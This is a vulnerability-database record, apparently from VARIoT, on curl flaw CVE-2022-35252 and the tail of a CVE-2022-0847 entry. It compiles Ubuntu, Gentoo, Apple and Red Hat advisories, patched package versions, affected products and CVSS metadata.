"db": "PACKETSTORM",
"id": "166516",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166569",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166241",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166280",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166265",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166264",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-0847",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-10T00:00:00",
"db": "VULMON",
"id": "CVE-2022-0847",
"ident": null
},
{
"date": "2022-03-28T19:12:00",
"db": "PACKETSTORM",
"id": "169268",
"ident": null
},
{
"date": "2022-04-21T15:12:25",
"db": "PACKETSTORM",
"id": "166812",
"ident": null
},
{
"date": "2022-03-29T15:53:19",
"db": "PACKETSTORM",
"id": "166516",
"ident": null
},
{
"date": "2022-04-01T15:43:44",
"db": "PACKETSTORM",
"id": "166569",
"ident": null
},
{
"date": "2022-03-09T15:15:52",
"db": "PACKETSTORM",
"id": "166241",
"ident": null
},
{
"date": "2022-03-11T16:38:56",
"db": "PACKETSTORM",
"id": "166280",
"ident": null
},
{
"date": "2022-03-11T16:31:15",
"db": "PACKETSTORM",
"id": "166265",
"ident": null
},
{
"date": "2022-03-11T16:31:02",
"db": "PACKETSTORM",
"id": "166264",
"ident": null
},
{
"date": "2022-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-522",
"ident": null
},
{
"date": "2023-07-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-007117",
"ident": null
},
{
"date": "2022-03-10T17:44:57.283000",
"db": "NVD",
"id": "CVE-2022-0847",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2024-01-12T00:00:00",
"db": "VULMON",
"id": "CVE-2022-0847",
"ident": null
},
{
"date": "2022-08-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-522",
"ident": null
},
{
"date": "2023-07-12T06:29:00",
"db": "JVNDB",
"id": "JVNDB-2022-007117",
"ident": null
},
{
"date": "2025-11-06T14:50:37.153000",
"db": "NVD",
"id": "CVE-2022-0847",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "166569"
},
{
"db": "PACKETSTORM",
"id": "166241"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Initialization vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
}
],
"trust": 0.6
}
}
VAR-202208-2263
Vulnerability from variot - Updated: 2026-03-09 23:13When curl is used to retrieve and parse cookies from a HTTP(S) server, itaccepts cookies using control codes that when later are sent back to a HTTPserver might make the server return 400 responses. Effectively allowing a"sister site" to deny service to all siblings. A security vulnerability exists in curl versions 4.9 through 7.84. ========================================================================== Ubuntu Security Notice USN-5587-1 September 01, 2022
curl vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 22.04 LTS
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
curl could be denied access to a HTTP(S) content if it recieved a specially crafted cookie.
Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries
Details:
Axel Chong discovered that when curl accepted and sent back cookies containing control bytes that a HTTP(S) server might return a 400 (Bad Request Error) response. A malicious cookie host could possibly use this to cause denial-of-service.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 22.04 LTS: curl 7.81.0-1ubuntu1.4 libcurl3-gnutls 7.81.0-1ubuntu1.4 libcurl3-nss 7.81.0-1ubuntu1.4 libcurl4 7.81.0-1ubuntu1.4
Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.13 libcurl3-gnutls 7.68.0-1ubuntu2.13 libcurl3-nss 7.68.0-1ubuntu2.13 libcurl4 7.68.0-1ubuntu2.13
Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.20 libcurl3-gnutls 7.58.0-2ubuntu3.20 libcurl3-nss 7.58.0-2ubuntu3.20 libcurl4 7.58.0-2ubuntu3.20
Ubuntu 16.04 ESM: curl 7.47.0-1ubuntu2.19+esm5 libcurl3 7.47.0-1ubuntu2.19+esm5 libcurl3-gnutls 7.47.0-1ubuntu2.19+esm5 libcurl3-nss 7.47.0-1ubuntu2.19+esm5
Ubuntu 14.04 ESM: curl 7.35.0-1ubuntu2.20+esm12 libcurl3 7.35.0-1ubuntu2.20+esm12 libcurl3-gnutls 7.35.0-1ubuntu2.20+esm12 libcurl3-nss 7.35.0-1ubuntu2.20+esm12
In general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202212-01
https://security.gentoo.org/
Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01
Synopsis
Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.
Background
A command line tool and library for transferring data with URLs.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All curl users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
References
[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922 [ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923 [ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925 [ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926 [ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945 [ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946 [ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947 [ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576 [ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774 [ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775 [ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776 [ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779 [ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780 [ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781 [ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782 [ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115 [ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205 [ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206 [ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207 [ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208 [ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221 [ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252 [ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260 [ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915 [ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2023-01-23-5 macOS Monterey 12.6.3
macOS Monterey 12.6.3 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213604.
AppleMobileFileIntegrity Available for: macOS Monterey Impact: An app may be able to access user-sensitive data Description: This issue was addressed by enabling hardened runtime. CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing (wojciechregula.blog)
curl Available for: macOS Monterey Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.86.0. CVE-2022-42915 CVE-2022-42916 CVE-2022-32221 CVE-2022-35260
curl Available for: macOS Monterey Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.85.0. CVE-2022-35252
dcerpc Available for: macOS Monterey Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco Talos
DiskArbitration Available for: macOS Monterey Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password Description: A logic issue was addressed with improved state management. CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)
DriverKit Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved checks. CVE-2022-32915: Tommy Muir (@Muirey03)
Intel Graphics Driver Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2023-23507: an anonymous researcher
Kernel Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2023-23504: Adam Doupé of ASU SEFCOM
Kernel Available for: macOS Monterey Impact: An app may be able to determine kernel memory layout Description: An information disclosure issue was addressed by removing the vulnerable code. CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. (@starlabs_sg)
PackageKit Available for: macOS Monterey Impact: An app may be able to gain root privileges Description: A logic issue was addressed with improved state management. CVE-2023-23497: Mickey Jin (@patch1t)
Screen Time Available for: macOS Monterey Impact: An app may be able to access information about a user’s contacts Description: A privacy issue was addressed with improved private data redaction for log entries. CVE-2023-23505: Wojciech Regula of SecuRing (wojciechregula.blog)
Weather Available for: macOS Monterey Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an anonymous researcher
WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: The issue was addressed with improved memory handling. WebKit Bugzilla: 248268 CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE WebKit Bugzilla: 248268 CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE
Windows Installer Available for: macOS Monterey Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23508: Mickey Jin (@patch1t)
Additional recognition
Kernel We would like to acknowledge Nick Stenning of Replicate for their assistance.
macOS Monterey 12.6.3 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
The following advisory data is extracted from:
https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json
Red Hat officially shut down their mailing list notifications October 10, 2023. Due to this, Packet Storm has recreated the below data as a reference point to raise awareness. It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment. Summary:
Red Hat Advanced Cluster Management for Kubernetes 2.6.6 General Availability release images, which fix security issues and update container images. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.6.6 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.
This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/
Security Fix(es): * CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command * CVE-2023-32314 vm2: Sandbox Escape * CVE-2023-32313 vm2: Inspect Manipulation
- Solution:
For Red Hat Advanced Cluster Management for Kubernetes, see the following documentation for details on how to install the images:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online
- Bugs fixed (https://bugzilla.redhat.com/):
2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command 2208376 - CVE-2023-32314 vm2: Sandbox Escape 2208377 - CVE-2023-32313 vm2: Inspect Manipulation
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Low: curl security update Advisory ID: RHSA-2023:2478-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:2478 Issue date: 2023-05-09 CVE Names: CVE-2022-35252 CVE-2022-43552 ==================================================================== 1. Summary:
An update for curl is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
-
curl: Incorrect handling of control code characters in cookies (CVE-2022-35252)
-
curl: Use-after-free triggered by an HTTP proxy deny response (CVE-2022-43552)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.2 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2120718 - CVE-2022-35252 curl: Incorrect handling of control code characters in cookies 2152652 - CVE-2022-43552 curl: Use-after-free triggered by an HTTP proxy deny response
- Package List:
Red Hat Enterprise Linux AppStream (v. 9):
aarch64: curl-debuginfo-7.76.1-23.el9.aarch64.rpm curl-debugsource-7.76.1-23.el9.aarch64.rpm curl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-devel-7.76.1-23.el9.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm
ppc64le: curl-debuginfo-7.76.1-23.el9.ppc64le.rpm curl-debugsource-7.76.1-23.el9.ppc64le.rpm curl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-devel-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm
s390x: curl-debuginfo-7.76.1-23.el9.s390x.rpm curl-debugsource-7.76.1-23.el9.s390x.rpm curl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-devel-7.76.1-23.el9.s390x.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm
x86_64: curl-debuginfo-7.76.1-23.el9.i686.rpm curl-debuginfo-7.76.1-23.el9.x86_64.rpm curl-debugsource-7.76.1-23.el9.i686.rpm curl-debugsource-7.76.1-23.el9.x86_64.rpm curl-minimal-debuginfo-7.76.1-23.el9.i686.rpm curl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-debuginfo-7.76.1-23.el9.i686.rpm libcurl-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-devel-7.76.1-23.el9.i686.rpm libcurl-devel-7.76.1-23.el9.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 9):
Source: curl-7.76.1-23.el9.src.rpm
aarch64: curl-7.76.1-23.el9.aarch64.rpm curl-debuginfo-7.76.1-23.el9.aarch64.rpm curl-debugsource-7.76.1-23.el9.aarch64.rpm curl-minimal-7.76.1-23.el9.aarch64.rpm curl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-7.76.1-23.el9.aarch64.rpm libcurl-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-minimal-7.76.1-23.el9.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm
ppc64le: curl-7.76.1-23.el9.ppc64le.rpm curl-debuginfo-7.76.1-23.el9.ppc64le.rpm curl-debugsource-7.76.1-23.el9.ppc64le.rpm curl-minimal-7.76.1-23.el9.ppc64le.rpm curl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-7.76.1-23.el9.ppc64le.rpm libcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm
s390x: curl-7.76.1-23.el9.s390x.rpm curl-debuginfo-7.76.1-23.el9.s390x.rpm curl-debugsource-7.76.1-23.el9.s390x.rpm curl-minimal-7.76.1-23.el9.s390x.rpm curl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-7.76.1-23.el9.s390x.rpm libcurl-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-minimal-7.76.1-23.el9.s390x.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm
x86_64: curl-7.76.1-23.el9.x86_64.rpm curl-debuginfo-7.76.1-23.el9.i686.rpm curl-debuginfo-7.76.1-23.el9.x86_64.rpm curl-debugsource-7.76.1-23.el9.i686.rpm curl-debugsource-7.76.1-23.el9.x86_64.rpm curl-minimal-7.76.1-23.el9.x86_64.rpm curl-minimal-debuginfo-7.76.1-23.el9.i686.rpm curl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-7.76.1-23.el9.i686.rpm libcurl-7.76.1-23.el9.x86_64.rpm libcurl-debuginfo-7.76.1-23.el9.i686.rpm libcurl-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-minimal-7.76.1-23.el9.i686.rpm libcurl-minimal-7.76.1-23.el9.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-35252 https://access.redhat.com/security/cve/CVE-2022-43552 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBZFo0V9zjgjWX9erEAQhmTw/9FUwLCGRKCmddNVTMAaay54EPggJFOPKx nN06YIqiK5arkX4SD58YZrX9J0gUZcwGs6s5WO35pG3F+qJXhe8E8fbzavqRG5NB oxG+pDC5+6xQxK41tkuLYJoUhF1w4yG8SuMSzroLcpbut/MAjKGGw4qgyNGit1Su xFGrDTyFxtj+tUZIQCil0HAqlXswQ7G2ukB9kQBpxNRfR0V2ANfmfkkGj8+xWauh L1PcaDezNWgAbgWbuf3mHNiwDMxWsNfcwCbx3P8sF+vRe7q5RdIFNL1oXJkPxQVy C6L29KcaLYxToNmUNyrOncWAj8KSlrDngVq3NXnG34lVzqz2t/ouc/0lX4Jc9qTL mGwYoXvlTqQgV4hGQPfDufApaukxgZfcSidSfqlNt1amYYNiYcvIyf15dht87ipB 27ahZWDKvunB4gqMG62XNHyiu9bKmDCyL57ggUBt3wxJ7H9M/OgjsI7C/i/10SMT D75GjYaU2TWyGLd4SvbV6/3pA3zAZ0Ffqc66uANwfBXC7jFd2/ykEBir3vJYTq17 r2YWYgH2sma5kwb7ZHQhLKk+N2a0g1KX+Mr0V2wJ+yAYwkbz6wu/BVDXstBFkumJ /iKmtOn0Mk07wo/3wvWu5M4tk4kZzmLzs1/ybH3GWOUbFUxbqgOos3/0Vi/uSW88 Yxf4bV/uBmU=HlZ2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters. After deploying the VolSync operator, it can create and maintain copies of your persistent data.
For more information about VolSync, see:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync
or the VolSync open source community website at: https://volsync.readthedocs.io/en/stable/.
Security fix(es): * CVE-2023-3089 openshift: OCP & FIPS mode
- Bugs fixed (https://bugzilla.redhat.com/):
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode
5
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.85.0"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.7.3"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "176746"
},
{
"db": "PACKETSTORM",
"id": "172378"
},
{
"db": "PACKETSTORM",
"id": "172587"
},
{
"db": "PACKETSTORM",
"id": "172195"
},
{
"db": "PACKETSTORM",
"id": "174080"
}
],
"trust": 0.5
},
"cve": "CVE-2022-35252",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"id": "CVE-2022-35252",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-35252",
"trust": 1.0,
"value": "LOW"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-35252",
"trust": 1.0,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202208-4523",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
},
{
"db": "NVD",
"id": "CVE-2022-35252"
},
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"description": {
"_id": null,
"data": "When curl is used to retrieve and parse cookies from a HTTP(S) server, itaccepts cookies using control codes that when later are sent back to a HTTPserver might make the server return 400 responses. Effectively allowing a\"sister site\" to deny service to all siblings. A security vulnerability exists in curl versions 4.9 through 7.84. ==========================================================================\nUbuntu Security Notice USN-5587-1\nSeptember 01, 2022\n\ncurl vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.04 LTS\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\ncurl could be denied access to a HTTP(S) content if it recieved\na specially crafted cookie. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nAxel Chong discovered that when curl accepted and sent back\ncookies containing control bytes that a HTTP(S) server might\nreturn a 400 (Bad Request Error) response. A malicious cookie\nhost could possibly use this to cause denial-of-service. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.04 LTS:\ncurl 7.81.0-1ubuntu1.4\nlibcurl3-gnutls 7.81.0-1ubuntu1.4\nlibcurl3-nss 7.81.0-1ubuntu1.4\nlibcurl4 7.81.0-1ubuntu1.4\n\nUbuntu 20.04 LTS:\ncurl 7.68.0-1ubuntu2.13\nlibcurl3-gnutls 7.68.0-1ubuntu2.13\nlibcurl3-nss 7.68.0-1ubuntu2.13\nlibcurl4 7.68.0-1ubuntu2.13\n\nUbuntu 18.04 LTS:\ncurl 7.58.0-2ubuntu3.20\nlibcurl3-gnutls 7.58.0-2ubuntu3.20\nlibcurl3-nss 7.58.0-2ubuntu3.20\nlibcurl4 7.58.0-2ubuntu3.20\n\nUbuntu 16.04 ESM:\ncurl 7.47.0-1ubuntu2.19+esm5\nlibcurl3 7.47.0-1ubuntu2.19+esm5\nlibcurl3-gnutls 7.47.0-1ubuntu2.19+esm5\nlibcurl3-nss 7.47.0-1ubuntu2.19+esm5\n\nUbuntu 14.04 ESM:\ncurl 7.35.0-1ubuntu2.20+esm12\nlibcurl3 7.35.0-1ubuntu2.20+esm12\nlibcurl3-gnutls 7.35.0-1ubuntu2.20+esm12\nlibcurl3-nss 7.35.0-1ubuntu2.20+esm12\n\nIn general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: curl: Multiple Vulnerabilities\n Date: December 19, 2022\n Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/curl \u003c 7.86.0 \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. 